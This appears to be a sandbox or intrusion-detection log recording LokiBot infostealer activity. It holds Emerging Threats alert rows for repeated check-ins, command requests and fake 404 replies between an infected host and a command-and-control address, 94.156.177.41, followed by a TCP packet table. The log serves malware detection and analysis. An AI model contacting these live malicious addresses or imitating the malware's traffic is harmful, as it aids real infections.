2024-11-20T10:12:55.068247+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49252	94.156.177.41	80	TCP
2024-11-20T10:12:55.068247+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49252	94.156.177.41	80	TCP
2024-11-20T10:12:55.073293+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49252	TCP
2024-11-20T10:12:55.205372+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49253	94.156.177.41	80	TCP
2024-11-20T10:12:55.205372+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49253	94.156.177.41	80	TCP
2024-11-20T10:12:55.205372+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49253	94.156.177.41	80	TCP
2024-11-20T10:12:55.953617+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49253	94.156.177.41	80	TCP
2024-11-20T10:12:55.953617+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49253	94.156.177.41	80	TCP
2024-11-20T10:12:55.961425+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49253	TCP
2024-11-20T10:12:56.120814+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49254	94.156.177.41	80	TCP
2024-11-20T10:12:56.120814+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49254	94.156.177.41	80	TCP
2024-11-20T10:12:56.120814+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49254	94.156.177.41	80	TCP
2024-11-20T10:12:56.843900+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49254	94.156.177.41	80	TCP
2024-11-20T10:12:56.843900+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49254	94.156.177.41	80	TCP
2024-11-20T10:12:56.849610+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49254	TCP
2024-11-20T10:12:57.001731+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49255	94.156.177.41	80	TCP
2024-11-20T10:12:57.001731+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49255	94.156.177.41	80	TCP
2024-11-20T10:12:57.001731+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49255	94.156.177.41	80	TCP
2024-11-20T10:12:57.763167+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49255	94.156.177.41	80	TCP
2024-11-20T10:12:57.763167+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49255	94.156.177.41	80	TCP
2024-11-20T10:12:57.768461+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49255	TCP
2024-11-20T10:12:57.910682+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49256	94.156.177.41	80	TCP
2024-11-20T10:12:57.910682+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49256	94.156.177.41	80	TCP
2024-11-20T10:12:57.910682+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49256	94.156.177.41	80	TCP
2024-11-20T10:12:58.781339+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49256	94.156.177.41	80	TCP
2024-11-20T10:12:58.781339+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49256	94.156.177.41	80	TCP
2024-11-20T10:12:58.804070+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49256	TCP
2024-11-20T10:12:58.994068+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49257	94.156.177.41	80	TCP
2024-11-20T10:12:58.994068+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49257	94.156.177.41	80	TCP
2024-11-20T10:12:58.994068+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49257	94.156.177.41	80	TCP
2024-11-20T10:12:59.717917+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49257	94.156.177.41	80	TCP
2024-11-20T10:12:59.717917+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49257	94.156.177.41	80	TCP
2024-11-20T10:12:59.724299+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49257	TCP
2024-11-20T10:12:59.856695+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49258	94.156.177.41	80	TCP
2024-11-20T10:12:59.856695+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49258	94.156.177.41	80	TCP
2024-11-20T10:12:59.856695+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49258	94.156.177.41	80	TCP
2024-11-20T10:13:00.715397+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49258	94.156.177.41	80	TCP
2024-11-20T10:13:00.715397+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49258	94.156.177.41	80	TCP
2024-11-20T10:13:00.720255+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49258	TCP
2024-11-20T10:13:00.859620+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49259	94.156.177.41	80	TCP
2024-11-20T10:13:00.859620+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49259	94.156.177.41	80	TCP
2024-11-20T10:13:00.859620+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49259	94.156.177.41	80	TCP
2024-11-20T10:13:01.604317+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49259	94.156.177.41	80	TCP
2024-11-20T10:13:01.604317+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49259	94.156.177.41	80	TCP
2024-11-20T10:13:01.618232+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49259	TCP
2024-11-20T10:13:01.807106+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49260	94.156.177.41	80	TCP
2024-11-20T10:13:01.807106+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49260	94.156.177.41	80	TCP
2024-11-20T10:13:01.807106+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49260	94.156.177.41	80	TCP
2024-11-20T10:13:02.699741+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49260	94.156.177.41	80	TCP
2024-11-20T10:13:02.699741+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49260	94.156.177.41	80	TCP
2024-11-20T10:13:02.706048+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49260	TCP
2024-11-20T10:13:02.864990+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49261	94.156.177.41	80	TCP
2024-11-20T10:13:02.864990+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49261	94.156.177.41	80	TCP
2024-11-20T10:13:02.864990+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49261	94.156.177.41	80	TCP
2024-11-20T10:13:03.729524+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49261	94.156.177.41	80	TCP
2024-11-20T10:13:03.729524+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49261	94.156.177.41	80	TCP
2024-11-20T10:13:03.734512+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49261	TCP
2024-11-20T10:13:03.882271+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49262	94.156.177.41	80	TCP
2024-11-20T10:13:03.882271+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49262	94.156.177.41	80	TCP
2024-11-20T10:13:03.882271+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49262	94.156.177.41	80	TCP
2024-11-20T10:13:04.648130+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49262	94.156.177.41	80	TCP
2024-11-20T10:13:04.648130+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49262	94.156.177.41	80	TCP
2024-11-20T10:13:04.655379+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49262	TCP
2024-11-20T10:13:04.788703+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49263	94.156.177.41	80	TCP
2024-11-20T10:13:04.788703+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49263	94.156.177.41	80	TCP
2024-11-20T10:13:04.788703+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49263	94.156.177.41	80	TCP
2024-11-20T10:13:05.554936+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49263	94.156.177.41	80	TCP
2024-11-20T10:13:05.554936+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49263	94.156.177.41	80	TCP
2024-11-20T10:13:05.559942+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49263	TCP
2024-11-20T10:13:05.710359+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49264	94.156.177.41	80	TCP
2024-11-20T10:13:05.710359+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49264	94.156.177.41	80	TCP
2024-11-20T10:13:05.710359+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49264	94.156.177.41	80	TCP
2024-11-20T10:13:06.564082+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49264	94.156.177.41	80	TCP
2024-11-20T10:13:06.564082+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49264	94.156.177.41	80	TCP
2024-11-20T10:13:06.568943+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49264	TCP
2024-11-20T10:13:06.715979+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49265	94.156.177.41	80	TCP
2024-11-20T10:13:06.715979+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49265	94.156.177.41	80	TCP
2024-11-20T10:13:06.715979+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49265	94.156.177.41	80	TCP
2024-11-20T10:13:07.564936+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49265	94.156.177.41	80	TCP
2024-11-20T10:13:07.564936+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49265	94.156.177.41	80	TCP
2024-11-20T10:13:07.572722+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49265	TCP
2024-11-20T10:13:07.728341+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49266	94.156.177.41	80	TCP
2024-11-20T10:13:07.728341+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49266	94.156.177.41	80	TCP
2024-11-20T10:13:07.728341+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49266	94.156.177.41	80	TCP
2024-11-20T10:13:08.449519+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49266	94.156.177.41	80	TCP
2024-11-20T10:13:08.449519+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49266	94.156.177.41	80	TCP
2024-11-20T10:13:08.454411+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49266	TCP
2024-11-20T10:13:08.595686+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49267	94.156.177.41	80	TCP
2024-11-20T10:13:08.595686+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49267	94.156.177.41	80	TCP
2024-11-20T10:13:08.595686+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49267	94.156.177.41	80	TCP
2024-11-20T10:13:09.331162+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49267	94.156.177.41	80	TCP
2024-11-20T10:13:09.331162+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49267	94.156.177.41	80	TCP
2024-11-20T10:13:09.336370+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49267	TCP
2024-11-20T10:13:09.484579+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49268	94.156.177.41	80	TCP
2024-11-20T10:13:09.484579+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49268	94.156.177.41	80	TCP
2024-11-20T10:13:09.484579+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49268	94.156.177.41	80	TCP
2024-11-20T10:13:10.215842+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49268	94.156.177.41	80	TCP
2024-11-20T10:13:10.215842+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49268	94.156.177.41	80	TCP
2024-11-20T10:13:10.224675+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49268	TCP
2024-11-20T10:13:10.364041+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49269	94.156.177.41	80	TCP
2024-11-20T10:13:10.364041+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49269	94.156.177.41	80	TCP
2024-11-20T10:13:10.364041+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49269	94.156.177.41	80	TCP
2024-11-20T10:13:11.234165+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49269	94.156.177.41	80	TCP
2024-11-20T10:13:11.234165+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49269	94.156.177.41	80	TCP
2024-11-20T10:13:11.239377+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49269	TCP
2024-11-20T10:13:11.382963+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49270	94.156.177.41	80	TCP
2024-11-20T10:13:11.382963+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49270	94.156.177.41	80	TCP
2024-11-20T10:13:11.382963+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49270	94.156.177.41	80	TCP
2024-11-20T10:13:12.128276+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49270	94.156.177.41	80	TCP
2024-11-20T10:13:12.128276+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49270	94.156.177.41	80	TCP
2024-11-20T10:13:12.133372+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49270	TCP
2024-11-20T10:13:12.272453+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49271	94.156.177.41	80	TCP
2024-11-20T10:13:12.272453+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49271	94.156.177.41	80	TCP
2024-11-20T10:13:12.272453+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49271	94.156.177.41	80	TCP
2024-11-20T10:13:13.149900+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49271	94.156.177.41	80	TCP
2024-11-20T10:13:13.149900+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49271	94.156.177.41	80	TCP
2024-11-20T10:13:13.154951+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49271	TCP
2024-11-20T10:13:13.292586+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49272	94.156.177.41	80	TCP
2024-11-20T10:13:13.292586+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49272	94.156.177.41	80	TCP
2024-11-20T10:13:13.292586+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49272	94.156.177.41	80	TCP
2024-11-20T10:13:14.047995+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49272	94.156.177.41	80	TCP
2024-11-20T10:13:14.047995+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49272	94.156.177.41	80	TCP
2024-11-20T10:13:14.053593+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49272	TCP
2024-11-20T10:13:14.191871+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49273	94.156.177.41	80	TCP
2024-11-20T10:13:14.191871+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49273	94.156.177.41	80	TCP
2024-11-20T10:13:14.191871+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49273	94.156.177.41	80	TCP
2024-11-20T10:13:14.921761+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49273	94.156.177.41	80	TCP
2024-11-20T10:13:14.921761+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49273	94.156.177.41	80	TCP
2024-11-20T10:13:14.931750+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49273	TCP
2024-11-20T10:13:15.065941+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49274	94.156.177.41	80	TCP
2024-11-20T10:13:15.065941+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49274	94.156.177.41	80	TCP
2024-11-20T10:13:15.065941+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49274	94.156.177.41	80	TCP
2024-11-20T10:13:15.927413+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49274	94.156.177.41	80	TCP
2024-11-20T10:13:15.927413+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49274	94.156.177.41	80	TCP
2024-11-20T10:13:15.934392+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49274	TCP
2024-11-20T10:13:16.079240+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49275	94.156.177.41	80	TCP
2024-11-20T10:13:16.079240+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49275	94.156.177.41	80	TCP
2024-11-20T10:13:16.079240+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49275	94.156.177.41	80	TCP
2024-11-20T10:13:16.829314+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49275	94.156.177.41	80	TCP
2024-11-20T10:13:16.829314+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49275	94.156.177.41	80	TCP
2024-11-20T10:13:16.839438+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49275	TCP
2024-11-20T10:13:17.017320+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49276	94.156.177.41	80	TCP
2024-11-20T10:13:17.017320+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49276	94.156.177.41	80	TCP
2024-11-20T10:13:17.017320+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49276	94.156.177.41	80	TCP
2024-11-20T10:13:17.903807+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49276	94.156.177.41	80	TCP
2024-11-20T10:13:17.903807+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49276	94.156.177.41	80	TCP
2024-11-20T10:13:17.908765+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49276	TCP
2024-11-20T10:13:18.056702+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49277	94.156.177.41	80	TCP
2024-11-20T10:13:18.056702+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49277	94.156.177.41	80	TCP
2024-11-20T10:13:18.056702+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49277	94.156.177.41	80	TCP
2024-11-20T10:13:18.831570+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49277	94.156.177.41	80	TCP
2024-11-20T10:13:18.831570+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49277	94.156.177.41	80	TCP
2024-11-20T10:13:18.840854+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49277	TCP
2024-11-20T10:13:18.985728+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49278	94.156.177.41	80	TCP
2024-11-20T10:13:18.985728+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49278	94.156.177.41	80	TCP
2024-11-20T10:13:18.985728+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49278	94.156.177.41	80	TCP
2024-11-20T10:13:19.881369+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49278	94.156.177.41	80	TCP
2024-11-20T10:13:19.881369+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49278	94.156.177.41	80	TCP
2024-11-20T10:13:19.886547+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49278	TCP
2024-11-20T10:13:20.030600+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49279	94.156.177.41	80	TCP
2024-11-20T10:13:20.030600+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49279	94.156.177.41	80	TCP
2024-11-20T10:13:20.030600+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49279	94.156.177.41	80	TCP
2024-11-20T10:13:20.786261+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49279	94.156.177.41	80	TCP
2024-11-20T10:13:20.786261+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49279	94.156.177.41	80	TCP
2024-11-20T10:13:20.791119+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49279	TCP
2024-11-20T10:13:21.135705+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49280	94.156.177.41	80	TCP
2024-11-20T10:13:21.135705+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49280	94.156.177.41	80	TCP
2024-11-20T10:13:21.135705+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49280	94.156.177.41	80	TCP
2024-11-20T10:13:21.865363+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49280	94.156.177.41	80	TCP
2024-11-20T10:13:21.865363+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49280	94.156.177.41	80	TCP
2024-11-20T10:13:21.870501+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49280	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 20, 2024 10:11:02.515557051 CET	49161	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:02.515590906 CET	443	49161	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:02.515654087 CET	49161	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:02.570441008 CET	49161	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:02.570455074 CET	443	49161	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:03.193300009 CET	443	49161	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:03.193384886 CET	49161	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:03.201539993 CET	49161	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:03.201550007 CET	443	49161	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:03.201881886 CET	443	49161	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:03.201967001 CET	49161	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:03.367563963 CET	49161	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:03.415380001 CET	443	49161	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:03.532283068 CET	443	49161	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:03.532339096 CET	49161	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:03.532361984 CET	443	49161	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:03.532386065 CET	443	49161	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:03.532402039 CET	49161	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:03.532588005 CET	49161	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:03.538660049 CET	49161	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:03.538683891 CET	443	49161	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:03.538693905 CET	49161	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:03.538739920 CET	49161	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:04.066611052 CET	49162	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:04.066642046 CET	443	49162	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:04.066742897 CET	49162	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:04.067153931 CET	49162	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:04.067169905 CET	443	49162	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:04.686850071 CET	443	49162	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:04.687128067 CET	49162	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:04.692554951 CET	49162	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:04.692563057 CET	443	49162	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:04.692960024 CET	443	49162	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:04.699629068 CET	49162	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:04.747334003 CET	443	49162	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:04.966545105 CET	443	49162	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:04.966633081 CET	443	49162	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:04.966715097 CET	49162	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:04.966715097 CET	49162	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:04.966785908 CET	49162	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:04.966804981 CET	443	49162	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:08.357222080 CET	49163	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:08.357253075 CET	443	49163	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:08.357305050 CET	49163	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:08.358247995 CET	49163	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:08.358259916 CET	443	49163	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:08.983057022 CET	443	49163	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:08.983129025 CET	49163	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:08.988609076 CET	49163	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:08.988626957 CET	443	49163	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:08.989023924 CET	443	49163	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:09.009886980 CET	49163	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:09.055344105 CET	443	49163	198.244.140.41	192.168.2.22
